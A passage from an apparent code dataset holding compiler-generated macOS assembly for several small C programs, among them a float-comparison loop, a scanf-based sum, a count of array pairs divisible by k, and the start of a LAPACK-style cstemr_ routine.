movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_409
jp LBB1_409
jmp LBB1_415
LBB1_409: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_410
jp LBB1_410
jmp LBB1_415
LBB1_410: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_411
jp LBB1_411
jmp LBB1_415
LBB1_411: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_412
jp LBB1_412
jmp LBB1_415
LBB1_412: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_413
jp LBB1_413
jmp LBB1_415
LBB1_413: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_414
jp LBB1_414
jmp LBB1_415
LBB1_414: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_415: ## in Loop: Header=BB1_8 Depth=1
movl -24(%rbp), %eax
movl %eax, -212(%rbp) ## 4-byte Spill
cmpl $0, -28(%rbp)
je LBB1_417
## %bb.416: ## in Loop: Header=BB1_8 Depth=1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -213(%rbp) ## 1-byte Spill
jae LBB1_418
LBB1_417: ## in Loop: Header=BB1_8 Depth=1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
setae %al
movb %al, -213(%rbp) ## 1-byte Spill
LBB1_418: ## in Loop: Header=BB1_8 Depth=1
movl -212(%rbp), %ecx ## 4-byte Reload
movb -213(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -214(%rbp) ## 1-byte Spill
jne LBB1_453
## %bb.419: ## in Loop: Header=BB1_8 Depth=1
movl -80(%rbp), %eax
movl %eax, -220(%rbp) ## 4-byte Spill
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -215(%rbp) ## 1-byte Spill
jae LBB1_426
## %bb.420: ## in Loop: Header=BB1_8 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -84(%rbp)
movb %al, -221(%rbp) ## 1-byte Spill
je LBB1_425
## %bb.421: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -28(%rbp)
je LBB1_423
## %bb.422: ## in Loop: Header=BB1_8 Depth=1
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -222(%rbp) ## 1-byte Spill
jae LBB1_424
LBB1_423: ## in Loop: Header=BB1_8 Depth=1
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
setae %al
movb %al, -222(%rbp) ## 1-byte Spill
LBB1_424: ## in Loop: Header=BB1_8 Depth=1
movb -222(%rbp), %al ## 1-byte Reload
movb %al, -221(%rbp) ## 1-byte Spill
LBB1_425: ## in Loop: Header=BB1_8 Depth=1
movb -221(%rbp), %al ## 1-byte Reload
movb %al, -215(%rbp) ## 1-byte Spill
LBB1_426: ## in Loop: Header=BB1_8 Depth=1
movl -220(%rbp), %ecx ## 4-byte Reload
movb -215(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -214(%rbp) ## 1-byte Spill
jne LBB1_453
## %bb.427: ## in Loop: Header=BB1_8 Depth=1
movl -20(%rbp), %eax
movl %eax, -228(%rbp) ## 4-byte Spill
cmpl $0, -16(%rbp)
je LBB1_429
## %bb.428: ## in Loop: Header=BB1_8 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -8(%rbp)
movb %al, -229(%rbp) ## 1-byte Spill
jne LBB1_438
LBB1_429: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -16(%rbp)
je LBB1_431
## %bb.430: ## in Loop: Header=BB1_8 Depth=1
movb $1, %al
cmpl $0, -8(%rbp)
movb %al, -230(%rbp) ## 1-byte Spill
jne LBB1_437
LBB1_431: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -64(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movb $1, %al
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -231(%rbp) ## 1-byte Spill
jae LBB1_436
## %bb.432: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -64(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jae LBB1_435
## %bb.433: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -231(%rbp) ## 1-byte Spill
jb LBB1_436
## %bb.434: ## in Loop: Header=BB1_8 Depth=1
movb $1, %al
cmpl $0, -24(%rbp)
movb %al, -231(%rbp) ## 1-byte Spill
je LBB1_436
LBB1_435: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -16(%rbp)
setne %al
movb %al, -231(%rbp) ## 1-byte Spill
LBB1_436: ## in Loop: Header=BB1_8 Depth=1
movb -231(%rbp), %al ## 1-byte Reload
movb %al, -230(%rbp) ## 1-byte Spill
LBB1_437: ## in Loop: Header=BB1_8 Depth=1
movb -230(%rbp), %al ## 1-byte Reload
movb %al, -229(%rbp) ## 1-byte Spill
LBB1_438: ## in Loop: Header=BB1_8 Depth=1
movl -228(%rbp), %ecx ## 4-byte Reload
movb -229(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -214(%rbp) ## 1-byte Spill
jne LBB1_453
## %bb.439: ## in Loop: Header=BB1_8 Depth=1
movl -12(%rbp), %eax
movl %eax, -236(%rbp) ## 4-byte Spill
cmpl $0, -16(%rbp)
je LBB1_441
## %bb.440: ## in Loop: Header=BB1_8 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -8(%rbp)
movb %al, -237(%rbp) ## 1-byte Spill
jne LBB1_452
LBB1_441: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -16(%rbp)
je LBB1_443
## %bb.442: ## in Loop: Header=BB1_8 Depth=1
movb $1, %al
cmpl $0, -8(%rbp)
movb %al, -238(%rbp) ## 1-byte Spill
jne LBB1_451
LBB1_443: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -239(%rbp) ## 1-byte Spill
jae LBB1_450
## %bb.444: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jae LBB1_449
## %bb.445: ## in Loop: Header=BB1_8 Depth=1
movb $1, %al
cmpl $0, -80(%rbp)
movb %al, -239(%rbp) ## 1-byte Spill
je LBB1_450
## %bb.446: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -64(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jae LBB1_449
## %bb.447: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movb $1, %al
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -239(%rbp) ## 1-byte Spill
jb LBB1_450
## %bb.448: ## in Loop: Header=BB1_8 Depth=1
movb $1, %al
cmpl $0, -24(%rbp)
movb %al, -239(%rbp) ## 1-byte Spill
je LBB1_450
LBB1_449: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -8(%rbp)
setne %al
movb %al, -239(%rbp) ## 1-byte Spill
LBB1_450: ## in Loop: Header=BB1_8 Depth=1
movb -239(%rbp), %al ## 1-byte Reload
movb %al, -238(%rbp) ## 1-byte Spill
LBB1_451: ## in Loop: Header=BB1_8 Depth=1
movb -238(%rbp), %al ## 1-byte Reload
movb %al, -237(%rbp) ## 1-byte Spill
LBB1_452: ## in Loop: Header=BB1_8 Depth=1
movl -236(%rbp), %eax ## 4-byte Reload
movb -237(%rbp), %cl ## 1-byte Reload
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
sete %al
movb %al, -214(%rbp) ## 1-byte Spill
LBB1_453: ## in Loop: Header=BB1_8 Depth=1
movb -214(%rbp), %al ## 1-byte Reload
movb %al, -207(%rbp) ## 1-byte Spill
LBB1_454: ## in Loop: Header=BB1_8 Depth=1
movb -207(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movl %eax, -204(%rbp)
movl -12(%rbp), %eax
movl %eax, -8(%rbp)
movl -20(%rbp), %eax
movl %eax, -16(%rbp)
movl -28(%rbp), %eax
movl %eax, -24(%rbp)
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -32(%rbp)
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -40(%rbp)
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -48(%rbp)
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -56(%rbp)
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -64(%rbp)
movss -76(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -72(%rbp)
movl -84(%rbp), %eax
movl %eax, -80(%rbp)
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -88(%rbp)
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -96(%rbp)
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -104(%rbp)
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -112(%rbp)
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -120(%rbp)
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -128(%rbp)
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -136(%rbp)
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -144(%rbp)
movss -156(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -152(%rbp)
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -160(%rbp)
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -168(%rbp)
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -176(%rbp)
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -184(%rbp)
movss -196(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -192(%rbp)
jmp LBB1_8
LBB1_455:
movl -4(%rbp), %eax
addq $240, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/95449852.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
sub x8, x29, #8
stur wzr, [x29, #-8]
stur wzr, [x29, #-12]
str wzr, [sp, #16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w9, [x29, #-8]
ldr w8, [sp, #16]
add w8, w8, w9
str w8, [sp, #16]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_1
LBB0_4:
ldr w9, [sp, #16]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl $0, -8(%rbp)
movl $0, -12(%rbp)
movl $0, -16(%rbp)
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
addl -16(%rbp), %eax
movl %eax, -16(%rbp)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_4:
movl -16(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
.subsections_via_symbols
| the_stack_data/12636689.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldursw x9, [x29, #-8]
mov x8, #4
mul x0, x8, x9
bl _malloc
stur x0, [x29, #-24]
stur wzr, [x29, #-28]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-28]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-28]
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB0_1
LBB0_4:
str wzr, [sp, #32]
b LBB0_5
LBB0_5: ; =>This Loop Header: Depth=1
; Child Loop BB0_7 Depth 2
ldr w8, [sp, #32]
ldur w9, [x29, #-8]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_14
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_7
LBB0_7: ; Parent Loop BB0_5 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_12
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=2
ldur x8, [x29, #-24]
ldrsw x9, [sp, #32]
ldr w8, [x8, x9, lsl #2]
ldur x9, [x29, #-24]
ldrsw x10, [sp, #28]
ldr w9, [x9, x10, lsl #2]
add w8, w8, w9
ldur w10, [x29, #-12]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=2
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_7 Depth=2
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_7 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_7
LBB0_12: ; in Loop: Header=BB0_5 Depth=1
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_5
LBB0_14:
ldur w9, [x29, #-16]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d %d"
l_.str.1: ; @.str.1
.asciz "%d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
movb $0, %al
callq _scanf
movslq -8(%rbp), %rdi
shlq $2, %rdi
callq _malloc
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -24(%rbp), %rsi
movslq -28(%rbp), %rax
shlq $2, %rax
addq %rax, %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -32(%rbp)
LBB0_5: ## =>This Loop Header: Depth=1
## Child Loop BB0_7 Depth 2
movl -32(%rbp), %eax
movl -8(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jge LBB0_14
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
LBB0_7: ## Parent Loop BB0_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -36(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB0_12
## %bb.8: ## in Loop: Header=BB0_7 Depth=2
movq -24(%rbp), %rax
movslq -32(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movq -24(%rbp), %rcx
movslq -36(%rbp), %rdx
addl (%rcx,%rdx,4), %eax
cltd
idivl -12(%rbp)
cmpl $0, %edx
jne LBB0_10
## %bb.9: ## in Loop: Header=BB0_7 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
LBB0_10: ## in Loop: Header=BB0_7 Depth=2
jmp LBB0_11
LBB0_11: ## in Loop: Header=BB0_7 Depth=2
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_7
LBB0_12: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_13
LBB0_13: ## in Loop: Header=BB0_5 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB0_5
LBB0_14:
movl -16(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d %d"
L_.str.1: ## @.str.1
.asciz "%d"
.subsections_via_symbols
| the_stack_data/147142.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function cstemr_
lCPI0_0:
.quad 0x3f747ae140000000 ; double 0.004999999888241291
lCPI0_1:
.quad 0x3fa99999a0000000 ; double 0.05000000074505806
.section __TEXT,__text,regular,pure_instructions
.globl _cstemr_
.p2align 2
_cstemr_: ; @cstemr_
.cfi_startproc
; %bb.0:
stp x22, x21, [sp, #-48]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 48
stp x20, x19, [sp, #16] ; 16-byte Folded Spill
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w19, -24
.cfi_offset w20, -32
.cfi_offset w21, -40
.cfi_offset w22, -48
sub sp, sp, #640
mov x21, x0
mov x20, x1
mov x19, x2
ldr x2, [x29, #16]
ldr x1, [x29, #24]
ldr x0, [x29, #32]
ldr x17, [x29, #40]
ldr x16, [x29, #48]
ldr x15, [x29, #56]
ldr x14, [x29, #64]
ldr x13, [x29, #72]
ldr x12, [x29, #80]
ldr x11, [x29, #88]
ldr x10, [x29, #96]
ldr x9, [x29, #104]
ldr x8, [x29, #112]
stur x21, [x29, #-48]
stur x20, [x29, #-56]
stur x19, [x29, #-64]
stur x3, [x29, #-72]
stur x4, [x29, #-80]
stur x5, [x29, #-88]
stur x6, [x29, #-96]
stur x7, [x29, #-104]
stur x2, [x29, #-112]
stur x1, [x29, #-120]
stur x0, [x29, #-128]
stur x17, [x29, #-136]
stur x16, [x29, #-144]
stur x15, [x29, #-152]
stur x14, [x29, #-160]
stur x13, [x29, #-168]
stur x12, [x29, #-176]
stur x11, [x29, #-184]
stur x10, [x29, #-192]
stur x9, [x29, #-200]
stur x8, [x29, #-208]
ldur x8, [x29, #-72]
subs x8, x8, #4
stur x8, [x29, #-72]
ldur x8, [x29, #-80]
subs x8, x8, #4
stur x8, [x29, #-80]
ldur x8, [x29, #-128]
subs x8, x8, #4
stur x8, [x29, #-128]
ldur x8, [x29, #-144]
ldr w8, [x8]
stur w8, [x29, #-212]
ldur w8, [x29, #-212]
mov x9, #0
lsr w8, w8, #0
add w8, w8, #1
stur w8, [x29, #-216]
ldursw x10, [x29, #-216]
ldur x8, [x29, #-136]
subs x9, x9, x10
add x8, x8, x9, lsl #3
stur x8, [x29, #-136]
ldur x8, [x29, #-160]
subs x8, x8, #4
stur x8, [x29, #-160]
ldur x8, [x29, #-176]
subs x8, x8, #4
stur x8, [x29, #-176]
ldur x8, [x29, #-192]
subs x8, x8, #4
stur x8, [x29, #-192]
ldur x0, [x29, #-48]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
str x1, [sp, #200] ; 8-byte Folded Spill
bl _lsame_
str w0, [sp, #356]
ldur x0, [x29, #-56]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _lsame_
ldr x1, [sp, #200] ; 8-byte Folded Reload
str w0, [sp, #332]
ldur x0, [x29, #-56]
bl _lsame_
str w0, [sp, #308]
ldur x0, [x29, #-56]
